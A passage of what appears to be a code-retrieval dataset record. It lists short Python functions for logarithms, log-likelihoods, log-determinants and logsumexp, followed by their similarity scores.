k < n-2:\n alpha = -(r[k+2] + dot(r[1:k+2], y[k::-1]))/beta\n y[0:k+1] = y[0:k+1] + alpha * y[k::-1]\n y[k+1] = alpha \n\n return(sign, logdet)", "def shannon(state_space):\n if isinstance(state_space, int) or len(state_space) == 1:\n return 0\n ws = sum(state_space.values())\n if ws == 0:\n print(state_space)\n return math.log(ws) - sum(map(lambda x: x * math.log(x), state_space.values())) / ws", "def log_distr_fdmw(self, dnu, logflux, dme, logw, alpha, logls, logl0, mu, sigma, gtype=None):\n #stepdms = 100/1000.\n #vdms = np.arange(0, 100, stepdm)\n stepz = (np.log(self.Zmax) - np.log(self.Zmin)) / 1000\n vz = np.exp(np.arange(np.log(self.Zmin), np.log(self.Zmax), stepz))\n lik = 0\n for z in vz:\n likv = np.exp(self.log_distr_fdmwz(dnu, logflux, dme, logw, z, alpha, logls, logl0, mu, sigma, gtype=gtype))\n lik += z * stepz * likv\n ind = lik > 0\n ind2 = lik <= 0\n loglik = lik.copy()\n loglik[ind] = np.log(lik[ind])\n loglik[ind2] = np.ones(loglik[ind2].shape) * -1e99\n return loglik", "def _xlogx(x):\n y = x.copy()\n if isinstance(y, sparse.csc_matrix) or isinstance(y, sparse.csr_matrix):\n z = y.data\n else:\n z = np.asarray(y) # ensure np.matrix converted to np.array\n nz = z.nonzero()\n z[nz] *= np.log2(z[nz])\n return y", "def Log(A, B):\n return logm(inv(A).dot(B))", "def log(self, base):\n\n\t\tvalues = map(lambda x: x > 0, self.val)\n\t\tif not all(values):\n\t\t\traise ValueError(\"Non-positive number encountered in log.\")\n\t\telse:\n\t\t\tval = np.array([np.math.log(v, base) for v in self.val])\n\t\t\tif len(self.der.shape):\n\t\t\t\tto_multiply = 1 / np.multiply(np.log(base), self.val)\n\t\t\t\tto_multiply = np.expand_dims(to_multiply, 1) if len(self.der.shape) > len(to_multiply.shape) else to_multiply\n\t\t\t\tder = np.multiply(to_multiply, self.der)\n\t\t\telse:\n\t\t\t\tder = None\n\t\treturn Var(val, der)", "def my_loglike(theta, x, data, sigma):\n\n model = my_model(theta, x)\n\n return -0.5*len(x)*np.log(2*math.pi*sigma**2) - (0.5/sigma**2) * np.sum((data-model)**2)", "def NormLog(self,X,Y,parameterValues, independentValues):\n lgX = numpy.log10(X)\n D = numpy.around(lgX[1] - lgX[0],2)\n bins = 10**(lgX+D/2.) 
- 10**(lgX-D/2.)\n return Y/sum(Y*bins)", "def dfdx(self, X):\n \n return 3*(X[0])**2", "def evaluate(self, data):\n d = log(-log(data))\n return dot(d, self._sampling_matrix.T)", "def logintdim():\n dim = Integer(\"yolo5\", \"reciprocal\", 1, 10, shape=(3, 2))\n return dim", "def loglf2py(store):\n loglike=0.0\n return loglinear.logl(store['xb'],store['xmatf'], store['beta'],store['yvec'],loglike)", "def dlogdp(self):\n return np.log10(self.bins[:, -1]) - np.log10(self.bins[:, 0])", "def make_ln_func(variable):\n def safe_ln_queryset(qs):\n \"\"\"Takes the natural log of a queryset's values and handles zeros\"\"\"\n vals = qs.values_list(variable, flat=True)\n ret = np.log(vals)\n ret[ret == -np.inf] = 0\n return ret\n return safe_ln_queryset", "def logistic(self,w,Xi):\n # print(w.T)\n # print(Xi)\n a = np.dot(w.T,Xi)\n return 1/(1+np.exp(-a))", "def log2_inplace(a):", "def __pow__(self, a: float) -> np.ndarray:\n return np.e**(a*self.logarithm)", "def _forward_log_det_jacobian(self, x):\n d = self._compute_shared(x=x)\n relx = (x - d.x_k) / d.w_k\n relx = relx # tf.where(d.out_of_bounds, 0.5*tf.ones_like(x), relx)\n grad = (\n 2 * tf.math.log(d.s_k) +\n tf.math.log(d.d_kp1 * relx**2 + 2 * d.s_k * relx * (1 - relx) + # newln\n d.d_k * (1 - relx)**2) -\n 2 * tf.math.log((d.d_kp1 + d.d_k - 2 * d.s_k) * relx *\n (1 - relx) + d.s_k))\n return grad # tf.where(d.out_of_bounds, tf.zeros_like(grad), grad)", "def d1(self):\n f = (self.rf + (self.sigma ** (2)) / 2 ) * self.t\n return (1/(self.sigma * (self.t ** (0.5)))) *(math.log(self.s/self.x) + f)", "def ln(x):\n return log(x, const.e)", "def log10(self):\n return Factor().__build( VarSet(self.v) , np.log10(self.t) )", "def rms_db(self):\n mean_square = np.mean(self._samples ** 2, axis=0)\n return 10 * np.log10(mean_square)", "def logTF(self, tf):\n return math.log(tf)", "def logsumexp_trick(sum_term):\n max_term = np.max(sum_term)\n return max_term + np.log(np.sum(np.exp(sum_term-max_term)))", "def loglnumpy(store):\n xbeta = dot(store['xmat'], store['beta'])\n lamb = exp(xbeta)\n return sum(store['yvec'] * xbeta - lamb)", "def invwish_logpdf(X, S, df):\n d = X.shape[0]\n if df < d:\n raise ValueError('df must be greater than or equal to the number of '\n ' dimensions of S')\n if d != X.shape[1]:\n raise ValueError('X must be square.')\n if S.shape[0] != d or S.shape[1] != d:\n raise ValueError('S must be the same shape as X.')\n\n _, logdet_S = slogdet(S)\n _, logdet_X = slogdet(X)\n\n logpdf = (df/2)*logdet_S - ((df*d/2)*log(2) + multigammaln(df/2, d))\n logpdf += (-(d+df+1)/2)*logdet_X - (1/2)*trace(solve(X.T, S.T))\n\n return logpdf", "def log_sum_exp(x):\n x_max = x.data.max()\n return torch.log(torch.sum(torch.exp(x - x_max), 1, keepdim=True)) + x_max", "def log_sum_exp(x):\n x_max = x.data.max()\n return torch.log(torch.sum(torch.exp(x - x_max), 1, keepdim=True)) + x_max", "def log_gaussian_density(x, mu, L):\n\n D = x.shape[-1]\n # print(\"x shape:\", x.shape)\n # print(\"mu shape:\", mu.shape)\n # print(\"L shape:\", L.shape)\n\n a = np.linalg.solve(L, x - mu) # (..., K)-array\n\n logp = - 0.5 * D * np.log(2.0 * np.pi) - np.sum(np.log(np.diagonal(L))) \\\n - 0.5 * np.sum(a**2.0, axis=-1) # (...)-array; sums only the dimension of the Gaussian vector\n\n return logp", "def log_det_precisions(self):\n return tf.math.log(-2 * self.nat2)", "def _compute_logarithmic_distance_term(index, M, Rjb):\r\n return ((a4[index] + a5 * (M - c1)) * np.log(np.sqrt(Rjb**2. 
+ a6**2.)))", "def log_sum_exp(x):\n x_max = x.max()\n return torch.log(torch.sum(torch.exp(x - x_max), 1, keepdim=True)) + x_max", "def logaddexp(a, b):\n\n return torch.logsumexp(torch.cat([a.unsqueeze(0), b.unsqueeze(0)]), dim=0)", "def loglike(self, params, *args, **kwargs):\n return np.sum(self.loglikeobs(params, *args, **kwargs))", "def transform(self, original_input):\n return super(LogarithmicDimension, self).transform(np.log(original_input))", "def _perplexity(self, X, log_w):\n return np.exp(-log_w/X.sum())" ]
[ "0.63612115", "0.63412535", "0.6210124", "0.6097916", "0.60911155", "0.60809803", "0.60428435", "0.60420275", "0.6025387", "0.601383", "0.6008682", "0.59616804", "0.5944786", "0.5878604", "0.5871771", "0.5864707", "0.5863798", "0.58423436", "0.5829568", "0.5821031", "0.58171713", "0.5810316", "0.58041775", "0.58039594", "0.58027786", "0.5800487", "0.5799734", "0.5787852", "0.5780669", "0.5744475", "0.5741872", "0.573417", "0.573417", "0.57227004", "0.57214165", "0.57200384", "0.5713018", "0.56938565", "0.56644064", "0.56517124", "0.5640531", "0.56333643", "0.5633108", "0.562467", "0.561968", "0.56007946", "0.5591083", "0.5588046", "0.55837387", "0.55803317", "0.55723727", "0.5561702", "0.55573493", "0.5553427", "0.55376756", "0.5530476", "0.55185986", "0.5512506", "0.55112284", "0.54985183", "0.5486627", "0.54847246", "0.54734707", "0.5468933", "0.546597", "0.5462672", "0.5450029", "0.54452", "0.5441352", "0.54401386", "0.5431462", "0.54314446", "0.5430311", "0.539911", "0.5392924", "0.5391323", "0.53893274", "0.53833187", "0.53824526", "0.53789526", "0.53748006", "0.53648853", "0.53553706", "0.535064", "0.53452533", "0.5341926", "0.5326479", "0.5320955", "0.5319334", "0.5314673", "0.530881", "0.530881", "0.5296916", "0.5296761", "0.52964616", "0.5295292", "0.529452", "0.52912754", "0.5285184", "0.5282467" ]
0.6198977
3
r"""Compute the derivative of the innerproduct matrix. Compute the derivative of the innerproduct matrix of the Fisher information metric at the tangent space at base point.
def inner_product_derivative_matrix(self, base_point):
    def pdf(x):
        """Compute pdf at a fixed point on the support.

        Parameters
        ----------
        x : float, shape (,)
            Point on the support of the distribution
        """
        return lambda point: self.information_manifold.point_to_pdf(point)(x)

    def _function_to_integrate(x):
        pdf_x = pdf(x)
        pdf_x_at_base_point = pdf_x(base_point)
        pdf_x_derivative = gs.autodiff.jacobian(pdf_x)
        pdf_x_derivative_at_base_point = pdf_x_derivative(base_point)
        return (
            1
            / (pdf_x_at_base_point**2)
            * (
                2
                * pdf_x_at_base_point
                * gs.einsum(
                    "...ij, ...k -> ...ijk",
                    gs.autodiff.jacobian(pdf_x_derivative)(base_point),
                    pdf_x_derivative_at_base_point,
                )
                + gs.einsum(
                    "...i, ...j, ...k -> ...ijk",
                    pdf_x_derivative_at_base_point,
                    pdf_x_derivative_at_base_point,
                    pdf_x_derivative_at_base_point,
                )
            )
        )

    return quad_vec(_function_to_integrate, *self.support)[0]
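A rough sanity check for such a derivative of the metric matrix g_ij(theta) is to compare it against central finite differences of the metric itself. The sketch below is illustrative only; it assumes a callable metric_matrix(base_point) returning the Fisher metric as a NumPy array, and the ordering of the last (derivative) axis may need adjusting to match the analytic result:

import numpy as np

def finite_difference_metric_derivative(metric_matrix, base_point, eps=1e-6):
    # Approximate d g_ij / d theta_k by central differences; last axis indexes k.
    base_point = np.asarray(base_point, dtype=float)
    dim = base_point.shape[-1]
    g0 = np.asarray(metric_matrix(base_point))
    deriv = np.zeros(g0.shape + (dim,))
    for k in range(dim):
        step = np.zeros_like(base_point)
        step[k] = eps
        g_plus = np.asarray(metric_matrix(base_point + step))
        g_minus = np.asarray(metric_matrix(base_point - step))
        deriv[..., k] = (g_plus - g_minus) / (2 * eps)
    return deriv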
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def integrability_tensor_derivative(\n self,\n horizontal_vec_x,\n horizontal_vec_y,\n nabla_x_y,\n tangent_vec_e,\n nabla_x_e,\n base_point,\n ):\n raise NotImplementedError", "def derivatives(x_p, y_p):\r\n # set up the matrix equation\r\n n = x_p.shape[0]\r\n M = np.zeros( [n,n] )\r\n d = np.zeros( [n,1] )\r\n \r\n # fill in the constants where they can be\r\n for i in np.arange(1,n-1 ): # for all but the first and last row\r\n M[i,i-1 ] = ( x_p[i] - x_p[i-1] ) / 6.\r\n M[i,i] = ( x_p[i+1] - x_p[i-1] ) / 3.\r\n M[i,i+1] = ( x_p[i+1] - x_p[i] ) /6.\r\n d[i,0 ] = ( y_p[i+1] - y_p[i] ) / ( x_p[i+1] - x_p[i] ) - ( y_p[i] - y_p[i-1] ) / ( x_p[i] - x_p[i-1] )\r\n \r\n M[0,0],M[-1,-1] = 1.,1. # compactly sets the BCs\r\n \r\n LU = lu.LU_decomp(M) # solves the matrix equations\r\n return lu.FB_sub(LU.Low, LU.Upp, d) # find and return 2nd derivatives\r", "def gather_derivatives(self):\n self.xdot[0,0:self.n] = self.mdot[0:self.n] \n self.xdot[1,0:self.n] = self.rdot[0:self.n,0]\n self.xdot[2,0:self.n] = self.rdot[0:self.n,1]\n self.xdot[3,0:self.n] = self.rdot[0:self.n,2]\n self.xdot[4,0:self.n] = self.vdot[0:self.n,0]\n self.xdot[5,0:self.n] = self.vdot[0:self.n,1]\n self.xdot[6,0:self.n] = self.vdot[0:self.n,2]\n return self.xdot", "def dE_mdn(self, x, y, t, w1 = None, w2 = None):\n if w2 == None:\n w2 = self.w2\n M = int(self.M)\n # avoid underrun\n \n alpha, sigma, mu = self.getMixtureParams(y.T)\n #import pdb; pdb.set_trace()\n \n #T = t.T[None, None, :] # note: np.tile is slower than this notation\n T = t.T[None, :]\n \n phi = self._phi(T, mu, sigma)\n aphi = alpha*phi\n pi = aphi / np.sum(aphi, 0)\n \n # derivatives of E with respect to the output variables (s. Bishop 1995, chp. 6.4)\n dE_dy_alpha = alpha - pi\n dE_dy_sigma = - 0.5 * pi * ((np.sum((T-mu)**2 , 1) / sigma) - self.c)\n dE_dy_mu = pi[:,np.newaxis,:] * (mu - T) / sigma[:,np.newaxis,:]\n\n dk = np.zeros([self.ny, x.shape[0]])\n dk[0:M,:] = dE_dy_alpha\n dk[M:2*M,:] = dE_dy_sigma\n \n dk[2*M:] = np.reshape(dE_dy_mu, [M*self.c, x.shape[0]])\n \n # back-propagate the dks\n #t0=datetime.now()\n dEnw1, dEnw2 = self.backward(x, dk, None, w2)\n #print 'eval of dE_mdn:' + str((datetime.now()-t0))\n #dj = (1 - self.z[1:]**2) * np.dot(w2[:,1:].T, dk)\n # evaluate derivatives with respect to the weights\n #dEnw1 = (dj[:,:,np.newaxis]*x[np.newaxis,:,:]).transpose(1,0,2)\n #dEnw2 = (dk[:,:,np.newaxis]*self.z.T[np.newaxis,:,:]).transpose(1,0,2)\n return dEnw1, dEnw2", "def gather_derivatives(self):\n self.xdot[0,0:self.n] = self.mdot[0:self.n] \n self.xdot[1,0:self.n] = self.rdot[0:self.n,0]\n self.xdot[2,0:self.n] = self.rdot[0:self.n,1]\n self.xdot[3,0:self.n] = self.rdot[0:self.n,2]\n self.xdot[4,0:self.n] = self.vdot[0:self.n,0]\n self.xdot[5,0:self.n] = self.vdot[0:self.n,1]\n self.xdot[6,0:self.n] = self.vdot[0:self.n,2]\n self.xdot[7,0:self.n] = self.rhodot[0:self.n] \n self.xdot[8,0:self.n] = 0\n self.xdot[9,0:self.n] = 0\n self.xdot[10,0:self.n] = self.udot[0:self.n]\n return self.xdot", "def _derX(self, x, y):\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y)\n i = self.argcompare(temp, axis=1)\n dfdx = np.zeros_like(x)\n for j in range(self.funcCount):\n c = i == j\n dfdx[c] = self.functions[j].derivativeX(x[c], y[c])\n return dfdx", "def _2ndderiv_xyz(self,x,y,z,i,j):\n return -np.pi*self._rhoc_M*self.a**3*self._b*self._c *\\\n _2ndDerivInt(x,y,z,self._a2,self._b2*self._a2,self._c2*self._a2,self.n,i,j)", "def __call__ ( self , func , x , h , der = False 
) :\n\n ## calculate differences \n imax = self.__order + 2 if der else self.__order + 1\n i = 0\n while i < imax : \n j = i + 1\n self.__df[i] = func ( x + j * h ) - func ( x - j * h )\n i += 1\n \n ## 1) calculate 1st derivative \n result = dot_fma ( self.__order + 1 , self.__df , self.__d1 ) / ( self.__sf1 * h ) \n if not der : return result \n \n ## 2) calculate Nth derivative \n dd = dot_fma ( self.__order + 2 , self.__df , self.__d2 ) / ( self.__sf2 * h**(self.__order*2+3) ) \n \n return result, dd", "def _derY(self, x, y):\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y)\n i = self.argcompare(temp, axis=1)\n y = temp[np.arange(m), i]\n dfdy = np.zeros_like(x)\n for j in range(self.funcCount):\n c = i == j\n dfdy[c] = self.functions[j].derivativeY(x[c], y[c])\n return dfdy", "def det(self):\n if self.x == 0 or self.y == 0:\n return None\n elif self.x == 1 or self.y == 1:\n return self.retrieve(0,0)\n else:\n out = 0.0\n for x in xrange(0, self.x):\n out += self.retrieve(0,x)*self.C(0,x)\n return out", "def determinant(self):\n if not self.is_square():\n raise(ValueError, \"Cannot calculate determinant of non-square matrix.\")\n if self.h > 2:\n raise(NotImplementedError, \"Calculating determinant not implemented for matrices largerer than 2x2.\")\n\n # TODO - your code here\n if self.h == 1:\n return self.g[0][0] # a 1x1 matrix\n else:\n return ((self.g[0][0] * self.g[1][1]) - (self.g[0][1] * self.g[1][0])) # a 2x2 matrix\n # TODO - your code here", "def _2ndderiv_xyz(self, x, y, z, i, j):\n return (\n 4.0\n * numpy.pi\n * self._b\n * self._c\n * _2ndDerivInt(\n x,\n y,\n z,\n lambda m: self._mdens(m),\n lambda m: self._mdens_deriv(m),\n self._b2,\n self._c2,\n i,\n j,\n glx=self._glx,\n glw=self._glw,\n )\n )", "def derivative_matrix(g):\n\n def _(g):\n B = g.B[0].grad\n N = g.N[0]\n P = g.dec.P(1)\n H = np.vstack(P(B(i)) for i in range(N)).T\n return H\n\n return _(g), _(g.dual)", "def determinant(self):\n if not self.is_square():\n raise(ValueError, \"Cannot calculate determinant of non-square matrix.\")\n if self.h > 2:\n raise(NotImplementedError, \"Calculating determinant not implemented for matrices largerer than 2x2.\")\n \n # TODO - your code here\n if self.h == 1:\n return self.g[0][0];\n else:\n return self.g[0][0]*self.g[1][1]-self.g[0][1]*self.g[1][0];", "def det2(m):\n\t(a,b), (c,d) = m\n\treturn a*d - b*c", "def compute_derivs_matrices(vecs, adv_vecs, dt):\n return (adv_vecs - vecs)/(1.*dt)", "def _evalAndDer(self, x):\n m = len(x)\n fx = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n fx[:, j] = self.functions[j](x)\n i = self.argcompare(fx, axis=1)\n y = fx[np.arange(m), i]\n dydx = np.zeros_like(y)\n for j in range(self.funcCount):\n c = i == j\n dydx[c] = self.functions[j].derivative(x[c])\n return y, dydx", "def _evalAndDer(self, x):\n m = len(x)\n fx = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n fx[:, j] = self.functions[j](x)\n i = self.argcompare(fx, axis=1)\n y = fx[np.arange(m), i]\n dydx = np.zeros_like(y)\n for j in range(self.funcCount):\n c = i == j\n dydx[c] = self.functions[j].derivative(x[c])\n return y, dydx", "def derivative(self, theta):\n diag_gamma = np.dot(theta.T, self.X.T)\n logistic_term = self.logistic_fn(diag_gamma)\n diag_gamma = logistic_term * (1.0 - logistic_term)\n gamma = np.diag(diag_gamma)\n\n # v computation\n diags_v = 1.0 - 2*self.logistic_fn(np.dot(theta.T, self.X.T))\n diags_v = diags_v.reshape((-1, 1))\n diags_v = 
diags_v*self.X\n assert diags_v.shape == self.X.shape #N*d shape\n\n XtGamma = np.dot(self.X.T, gamma) # d*N shape\n\n # TODO: Verifier car pas sur de mon coup ... et surtout plus long...\n # id = np.eye(self.n_examples).reshape((self.n_examples, self.n_examples, 1))\n # diags_v = diags_v.reshape((self.n_examples, 1, self.dim))\n # v = id*diags_v # n*n*d tensor\n # left = np.tensordot(XtGamma, v, axes=(1, 0)) # shape d*N*d\n # assert left.shape == (self.dim, self.n_examples, self.dim)\n # dg = np.tensordot(left, self.X, axes=(1, 0))\n # dg = np.swapaxes(dg, axis1=-2, axis2=-1)\n\n dg = np.zeros((self.dim, self.dim, self.dim))\n for idx, v_i_diag in enumerate(diags_v.T):\n v_i = np.diag(v_i_diag)\n dg_di = np.dot(np.dot(XtGamma, v_i), self.X)\n dg[:, :, idx] = dg_di\n return dg", "def derv(self, t, y):\n x = y[0];\n xc = y[1];\n n = y[2];\n\n Bhat = self.G * (1.0 - n) * self.alpha0(t) * (1 - 0.4 * x) * (1 - 0.4 * xc);\n\n dydt = np.zeros(3)\n\n dydt[0] = sp.pi / 12.0 * (xc + Bhat);\n dydt[1] = sp.pi / 12.0 * (self.mu * (xc - 4.0 / 3.0 * pow(xc, 3.0)) - x * (\n pow(24.0 / (0.99669 * self.taux), 2.0) + self.kparam * Bhat));\n dydt[2] = 60.0 * (self.alpha0(t) * (1.0 - n) - self.delta * n);\n\n return (dydt)", "def calc_derivative(self, array_in, direction1, direction2 = False):\r\n A = array_in.copy()\r\n if direction1 != direction2:\r\n #Remove Nyquist frequency for even sample size and odd order of differentiation\r\n if direction1 == 'x' or direction2 == 'x':\r\n A[0,:] = 0.0\r\n if direction1 == 'y' or direction2 == 'y':\r\n A[:,0] = 0.0\r\n\r\n # Note that 'x' corresponds to the x1 direction, and 'y' to the\r\n # x2 direction\r\n # Perform first derivative in desired direction\r\n if direction1 == 'x':\r\n out = self.deriv_mat_x1*A\r\n elif direction1 == 'y':\r\n out = self.deriv_mat_x2*A\r\n\r\n # Perform second derivative in desired direction\r\n if direction2 == 'x':\r\n out = self.deriv_mat_x1*out\r\n elif direction2 == 'y':\r\n out = self.deriv_mat_x2*out\r\n\r\n return out", "def determinant(self):\n if self.n_rows != self.n_cols:\n raise Exception('Matrix is not square')\n if self.n_rows == 2:\n return (self.data[0][0] * self.data[1][1]) - (self.data[1][0] * self.data[0][1])\n else:\n echelon, ops = reduce_to_echelon(self.data.copy(), True)\n swaps = sum([1 if row[0] == 'swap' else 0 for row in ops])\n return math.prod([echelon[i][i] for i in range(len(echelon))]) * (-1) ** swaps", "def _dy(self, T):\n return self._h(np.diff(T)) * self._a / self._m / self._c * np.diff(T) * np.array([1, -1])", "def diffuse_2d(t,y,D,shape):\n m,n = shape\n Fliq0 = np.reshape(np.ascontiguousarray(y),(m,n))\n dy = np.zeros((m,n))\n\n # Calculate derivatives in the interior\n dy[1:-1, 1:-1] = (\n D * (Fliq0[:-2, 1:-1] - 2 * Fliq0[1:-1, 1:-1] + Fliq0[2:, 1:-1])\n + D * (Fliq0[1:-1, :-2] - 2 * Fliq0[1:-1, 1:-1] + Fliq0[1:-1, 2:])\n )\n # Handle periodic boundary conditions\n #Edges\n dy[0, 1:-1] = (\n D * (Fliq0[-1, 1:-1] - 2 * Fliq0[0, 1:-1] + Fliq0[1, 1:-1])\n + D * (Fliq0[0, :-2] - 2 * Fliq0[0, 1:-1] + Fliq0[0, 2:])\n )\n dy[-1, 1:-1] = (\n D * (Fliq0[-2, 1:-1] - 2 * Fliq0[-1, 1:-1] + Fliq0[0, 1:-1])\n + D * (Fliq0[-1, :-2] - 2 * Fliq0[-1, 1:-1] + Fliq0[-1, 2:])\n )\n dy[1:-1, 0] = (\n D * (Fliq0[:-2, 0] - 2 * Fliq0[1:-1, 0] + Fliq0[2:, 0])\n + D * (Fliq0[1:-1, -1] - 2 * Fliq0[1:-1, 0] + Fliq0[1:-1, 1])\n )\n dy[1:-1, -1] = (\n D * (Fliq0[:-2, -1] - 2 * Fliq0[1:-1, -1] + Fliq0[2:, -1])\n + D * (Fliq0[1:-1, -2] - 2 * Fliq0[1:-1, -1] + Fliq0[1:-1, 0])\n )\n #Corners\n dy[0, 0] = (\n D * (Fliq0[-1, 0] - 2 
* Fliq0[0, 0] + Fliq0[1, 0])\n + D * (Fliq0[0, -1] - 2 * Fliq0[0, 0] + Fliq0[0, 1])\n )\n dy[-1, 0] = (\n D * (Fliq0[-2, 0] - 2 * Fliq0[-1, 0] + Fliq0[0, 0])\n + D * (Fliq0[-1, -1] - 2 * Fliq0[-1, 0] + Fliq0[-1, 1])\n )\n dy[0, -1] = (\n D * (Fliq0[-1, -1] - 2 * Fliq0[0, -1] + Fliq0[1, -1])\n + D * (Fliq0[0, -2] - 2 * Fliq0[0, -1] + Fliq0[0, 0])\n )\n dy[-1, -1] = (\n D * (Fliq0[-2, -1] - 2 * Fliq0[-1, -1] + Fliq0[0, -1])\n + D * (Fliq0[-1, -2] - 2 * Fliq0[-1, -1] + Fliq0[-1, 0])\n )\n\n return dy.flatten()", "def det(self):\n\n if self.rows != self.columns:\n raise ValueError(\"Matrix must be square\")\n\n if self.rows == 1:\n return self.row(1)[0]\n\n if self.rows == 2:\n return self.entry(1,1) * self.entry(2,2) - self.entry(1,2) * self.entry(2,1)\n\n det = 0\n row_to_expand = 1\n\n for i in range(1, self.columns + 1):\n det += self.entry(row_to_expand, i) * self._cofactor(row_to_expand, i)\n\n return det", "def determinant(self):\n d1 = self._row_1[0] * (self._row_2[1] * self._row_3[2] - self._row_2[2] * self._row_3[1])\n d2 = self._row_1[1] * (self._row_2[0] * self._row_3[2] - self._row_2[2] * self._row_3[0])\n d3 = self._row_1[2] * (self._row_2[0] * self._row_3[1] - self._row_2[1] * self._row_3[0])\n return d1 - d2 + d3", "def _derY(self, x, y, z):\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y, z)\n i = self.argcompare(temp, axis=1)\n y = temp[np.arange(m), i]\n dfdy = np.zeros_like(x)\n for j in range(self.funcCount):\n c = i == j\n dfdy[c] = self.functions[j].derivativeY(x[c], y[c], z[c])\n return dfdy", "def two_body_problem_derivatives(t, y):\n # E = compute_energy_of_twobodysystem(y)\n # positions\n ra = np.array([y[0:3]])\n rb = np.array([y[3:6]])\n # separation\n r_ab = rb - ra\n deltar = np.linalg.norm(r_ab)\n # accelerations\n rdotdota = Mb * r_ab / (deltar ** 3)\n rdotdotb = - Ma * r_ab / (deltar ** 3)\n # rewrite in column form\n ret = np.concatenate((np.array(y[6:]),rdotdota,rdotdotb), axis=None)\n return ret", "def det(v_i, v_j):\n return (v_i[0] * v_j[1]) - (v_j[0] * v_i[1])", "def det(v_i, v_j):\n return (v_i[0] * v_j[1]) - (v_j[0] * v_i[1])", "def derivative_func(t, x, Approx_func):\n return x.dot(Approx_func)", "def _derZ(self, x, y, z):\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y, z)\n i = self.argcompare(temp, axis=1)\n y = temp[np.arange(m), i]\n dfdz = np.zeros_like(x)\n for j in range(self.funcCount):\n c = i == j\n dfdz[c] = self.functions[j].derivativeZ(x[c], y[c], z[c])\n return dfdz", "def GetDerivative(self, *args):\n return _ITKCostFunctionsPython.itkMultipleValuedCostFunction_GetDerivative(self, *args)", "def _derX(self, x, y, z):\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y, z)\n i = self.argcompare(temp, axis=1)\n dfdx = np.zeros_like(x)\n for j in range(self.funcCount):\n c = i == j\n dfdx[c] = self.functions[j].derivativeX(x[c], y[c], z[c])\n return dfdx", "def det(v1, v2):\n\treturn v1[0] * v2[1] - v1[1] * v2[0]", "def activ_fn_derivative(z):\n return 1 - np.square(np.tanh(z))", "def getDerivativeSkeletonEqs(self):\n xs = np.array(self.XYProjections)[:,0]\n L = xs[-1] - xs[0]\n \n # Derivation\n xi = sy.symbols('xi')\n self.dudx_xyPlane = sy.diff(self.u_xyPlane, xi) / L\n \n # Then calculate the derivation equation on x-z plane\n self.dudx_xzPlane = sy.diff(self.u_xzPlane, xi) / L", "def 
get_derivative(self,var,g=None):\n if (g==None):g=self.g\n A=np.zeros([self.n+1,self.n])\n B=np.zeros([self.n+1])\n for i in range(self.n):\n B[i]=self.gamma*2.*g*self.N*(self.n-self.N)+np.sum([self.XXZ.Z(k,i)*(var[k]-var[i]) for k in range(self.n) if k!=i])\n A[self.n][i]=1\n for j in range(self.n):\n if(i==j): A[i][j]=2.*var[i]+2.+g*np.sum([self.XXZ.Z(k,i) for k in range(self.n) if k!=i])\n else: A[i][j]=-g*self.XXZ.Z(j,i)\n Ainv=np.linalg.pinv(A)\n der=np.dot(Ainv,B)\n return der", "def derivatives(self):\n self.rdot = self.v\n self.vdot[:,:] = 0.0\n self.udot[:] = 0.0\n\n t = time()\n for nl in self.nlists: \n nl.separations()\n #nl.apply_minimum_image()\n self.timing['pairsep time'] = (time() - t)\n\n t = time()\n if SPROPS:\n properties.spam_properties(self,self.nl_default \\\n ,self.h[0:self.n],self.hlr[0:self.n])\n self.timing['SPAM time'] = time() - t\n \n t = time()\n for force in self.forces:\n force.apply()\n self.timing['force time'] = time() - t\n \n if ADVECTIVE:\n self.rdot[:,:] = 0.0", "def derivative_activation(z):\n return activation(z) * (1 - activation(z))", "def det_matrix_2x2(m: list):\n return m[0][0]*m[1][1] - m[0][1]*m[1][0]", "def derivative(self, x):\n z = np.asarray(x)\n return (self._der(z.flatten())).reshape(z.shape)", "def _core_calc_degrad(self,bd,Ld) :\n\t\tdegrad = np.dot(Ld,bd) # Do matrix multiplication \n\t\tdegrad = np.exp(degrad) # Exponentiate to convert log to real\n\t\treturn degrad", "def derivative(a, y, z):\n return (a - y) * Sigmoid.derivative(z)", "def determinant(self) -> float:\n num_R, num_C = self.shape()\n assert num_R == num_C, f\"Determinant must be for a square matrix; this one is {self.shape()}.\"\n # -------------------------------------------------------\n # TODO: You write this one.\n # Note: this one should be recursive....\n if num_R == 1:\n return self.mat[0][0]\n det =0\n for i in range(num_R):\n det += self.mat[0][i] * self.get_minor(0,i).determinant() * (-1)**i\n return det\n pass # remove this when you add your code.\n # -------------------------------------------------------", "def Derivative(self, *args):\n return _Adaptor3d.Adaptor3d_InterFunc_Derivative(self, *args)", "def derivativeX(self, x, y):\n xa = np.asarray(x)\n ya = np.asarray(y)\n return (self._derX(xa.flatten(), ya.flatten())).reshape(xa.shape)", "def GetDerivative(self, *args):\n return _ITKCostFunctionsPython.itkSingleValuedCostFunction_GetDerivative(self, *args)", "def derivative(self, *args):\n if self.i_dim == 0:\n return np.ones_like(*args[0])\n else:\n return np.zeros_like(*args[0])", "def two_pt_deriv(tseries):\n dy = tseries.diff(2).shift(-1)\n dx = pd.Series(tseries.index).diff(2).shift(-1)\n return dy.apply(lambda x: x.values / dx.values, axis=0)", "def det_matrix(self):\n return np.linalg.det(self.take_matrix())", "def inner_product(self, tangent_vec_a, tangent_vec_b, base_point):\n inner_prod_mat = self.metric_matrix(base_point)\n aux = gs.einsum(\"...j,...jk->...k\", gs.conj(tangent_vec_a), inner_prod_mat)\n return gs.dot(aux, tangent_vec_b)", "def det(A):\n # Section 1: Establish n parameter and copy A\n n = len(A)\n AM = A[:]\n\n # Section 2: Row manipulate A into an upper triangle matrix\n for fd in range(n): # fd stands for focus diagonal\n if AM[fd][fd] == 0:\n AM[fd][fd] = 1.0e-18 # Cheating by adding zero + ~zero\n for i in range(fd+1, n): # skip row with fd in it.\n crScaler = AM[i][fd] / AM[fd][fd] # cr stands for \"current row\".\n for j in range(n): # cr - crScaler * fdRow, one element at a time.\n AM[i][j] = 